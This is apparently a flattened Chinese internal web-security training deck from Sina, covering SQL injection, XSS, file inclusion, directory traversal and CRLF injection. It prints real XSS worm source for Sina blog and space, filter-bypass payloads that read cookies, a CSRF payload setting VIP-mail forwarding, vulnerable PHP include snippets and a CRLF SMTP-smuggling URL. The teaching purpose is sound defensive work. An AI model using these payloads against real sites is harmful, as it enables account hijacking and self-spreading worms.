内容简介1.知己知彼,百战不殆2.解析黑客手中的利器3.捍卫代码城堡4.剑走偏锋5.惊栗后的深思6.双剑合壁新浪WEB安全培训ver.2互联网攻击趋势(统计来自computer.org)脚本安全编程重要性脚本安全编程重要性1.知己知彼,百战不殆传统攻击流程WEB攻击流程WEB攻击流程2.解析黑客手中的利器黑客攻击技术曝光一、脚本黑客的瑞士军刀--SQL注入攻击1.猜解出数据库中的敏感信息2.如果连接权限高的话会得到文件操作权限(load_file,intooutfile)3.根据数据库特性执行系统命令SQL注入利用的是参数传递的时候过滤不严时用参数组合成正确的SQL语句来执行操作的技术。简单的理解为:涉及进入SQL语句操作的变量没有过滤输入与转义输出实例-夜猫软件下载系统(攻击与修复)=1黑客攻击技术曝光黑客攻击技术曝光二、暗夜中舞动的精灵--XSS跨站脚本攻击1.进行会话劫持2.CSRF3.XSSWORM4.社会工程攻击、钓鱼、拒绝服务5.涂鸦页面XSS又叫CSS(CrossSiteScript),跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码(恶意JS代码),当用户浏览该页之时,嵌入其中Web里面的html代码(恶意JS代码)会被执行,从而达到恶意用户的特殊目的。输入一些数据需要在页面中显示出来,但是没有对这段数据做过滤输入或者转义输出。黑客攻击技术曝光xss特点继承浏览器权限社会工程,被动攻击影响广泛(只要浏览器支持JavaScript)隐蔽,难以察觉XSS可能出现在哪?1.HTML标签外部2.HTML标签内部(属性、事件)3.输入到javascript代码黑客攻击技术曝光黑客攻击技术曝光WEB安全新挑战-XSSWORM两段真实的XSSWROM统计数据百度XSS蠕虫攻击统计黑客攻击技术曝光新浪博客v5.0蠕虫varblogtitle=IOwNedyouRBloGvarblogbody=You\'rEmYfOOd.brahref=\蠕虫传播主体,不要构造这里/avarxmlhttp=newActiveXObject(Msxml2.XMLHTTP.3.0);xmlhttp.open(GET,/admin/article/article_add.php,false);xmlhttp.send();varxss=xmlhttp.responseText;token=xss.indexOf(vtoken);if(token0){vtoken=xss.substr(token+15,32);xmlhttp.open('post','/admin/article/article_post.php',false);xmlhttp.setRequestHeader('Content-Type','application/x-);xmlhttp.send('album=&blog_id=&is_album=0&stag=&sno=&channel_id=&url=&channel=&newsid=&book_worksid=&vtoken='+vtoken+'&is_media=0&blog_title='+blogtitle+'&blog_body='+blogbody+'&tag=&blog_class=0&x_cms_flag=1&sina_sort_id=117&is2bbs=1&join_circle=1');varsuss=xmlhttp.responseText;send=suss.indexOf(06001);if(send0){//alert(感染成功:));document.location=}else{alert(感染失败:();}}黑客攻击技术曝光新浪空间好友纸条群发蠕虫'---获取cookie中的uid---cookie=unescape(request(cookie))cflag=Instr(cookie,nick=)dflag=Instr(cookie,);)…………………省略……………………..'---遍历好友数---fori=1to500'---得到此uid的好友---url==&uid&&page=&i&&pagesize=1xml.openGET,url,Falsexml.sendhtmlcon=b2bstr(xml.responsebody)'---提取好友uid---aflag=Instr(htmlcon,{record:[{uid:)bflag=InStr(htmlcon,,ftype)Ifaflag0Andbflag0Thenokflag=Replace(Replace(mid(htmlcon,aflag,bflag),{record:[{uid:,),,)Else'---超过最大好友数就中断---exitforEndIf'---playload---Response.Writeiframesrc=message.asp?uid=&okflag&width=700height=30“frameborder=noborder=0marginwidth=0marginheight=0scrolling=no“allowtransparency=yes“next黑客攻击技术曝光永无止境的斗争--XSS过滤&突破BaiduXSS过滤绕过a{evilmask:ex/*exp/**/ression*/pression……}SinaXSS过滤绕过(input)=+style=xss:expression(alert(document.cookie));“Sourecode:inputtype=hiddenname=namevalue=style=xss:expression(alert(document.cookie));黑客攻击技术曝光新浪圈子--Html标签内部进攻黑客攻击技术曝光仔细分析该处也进行了敏感字符的过滤,比如javascript,TAB字元,“)等,但是经过测试发现这种过滤非常容易绕过,例如:JaVaScrIpT:eval(unescape('xmlhttp%3Dnew%20ActiveXObject%28%22Msxml2.XMLHTTP.3.0%22%29%3Bxmlhttp.open%28%22GET%22%2C%22/g33k/bbs/topic/tid%3D13037271%22%2Cfalse%29%3Bxmlhttp.send%28%29%3Balert%28xmlhttp.responseText%29%3B'));黑客攻击技术曝光被污染的页面代码:DIVclass=list_insideIMGstyle=WIDTH:auto;star:autosrc=JaVaScrIpT:eval(unescape('xss%3D%22reply_floor--------------省略部分代码--------------------alert%28xmlhttp.responseText%29%3B'));aaa/DIV/TD/TR/TBODY黑客攻击技术曝光新浪VIP邮箱CSRF攻击XMLID=xssIB<IMGSRC=javas!----cript:eval(unescape('xmlhttp%3Dnew%20ActiveXObject%28%22Msxml2.XMLHTTP.3.0%22%29%3Bxmlhttp.open%28%22GET%22%2C%22/classic/setforward.php%3Foptype%3D1%26is_open%3D1%26Forward_To%3Dmengzhuo@staff.sina.com.cn%26Forward_Save%3Don%22%2Cfalse%29%3Bxmlhttp.send%28%29%3Bvar%20a%3D%28xmlhttp.responseText%29%3Bdocument.write%28%22I%20Miss%20You%20%20from%20FengGou%20%3A%29%22%29%3B'));>/B/I/XMLSPANDATASRC=#xssDATAFLD=BDATAFORMATAS=HTML/SPAN黑客攻击技术曝光代码分析javas!----cript:eval(unescape('xmlhttp=newActiveXObject(Msxml2.XMLHTTP.3.0);xmlhttp.open(GET,/classic/setforward.php?optype=1&is_open=1&Forward_To=mengzhuo@staff.sina.com.cn&Forward_Save=on,false);xmlhttp.send();vara=(xmlhttp.responseText);document.write(IMissYoufromFengGou:));'));黑客攻击技术曝光黑客攻击技术曝光XSS重组攻击先进后执行/*/script*/(‘hi’);/**/alert/*script/*黑客攻击技术曝光三、千里之堤,毁于蚁穴--PHP文件包含漏洞服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造这个恶意文件来达到攻击的目的。黑客攻击技术曝光常见的攻击手法1.包含本地任意文件(读取、执行)2.包含远程任意文件(执行)3.直接执行系统命令(php://input)本地包含&远程包含黑客攻击技术曝光文件包含$file=$_GET[file];include($file);include('/config/'.$file);路径包含$path=$_GET[path];include($path.'/config.php');黑客攻击技术曝光黑客攻击技术曝光黑客攻击技术曝光四、一切尽在不言中--目录遍历1.查看当前以及其他目录结构与其文件2.危害目的由不正当使用的函数决定3.危害升级,CRLF注入。VulnCode:$fp=fopen($url,'r');fpassthru($fp);黑客攻击技术曝光四又1/2、文件名操作函数引发的血案—CRLFPHP的fopen(),file()及其它函数存在一个缺陷,即用户随意地添加额外HTTP报头信息到HTTP请求数据包中。攻击者可以利用此缺陷绕过服务器的安全限制,进行非法访问。在某些情况下,这个缺陷甚至可以打开任意的网络连接,在代理端执行PHP脚本和打开邮件转发。黑客攻击技术曝光doc.php?url=http%3A%2F%2Fstaff.sina.com.cn%3A25%2F+HTTP/1.0%0D%0AHELO+staff.sina.com.cn%0D%0AMAIL+FROM%3A%3Cmengzhuo@staff.sina.com.cn%3E%0D%0ARCPT+TO%3A%3Cxxx@staff.sina.com.cn%3E%0D%0ADATA%0D%0ACRLF+is+here%0D%0A.%0D%0AQUIT%0D%0A%0D%0Aurl=:mengzhuo@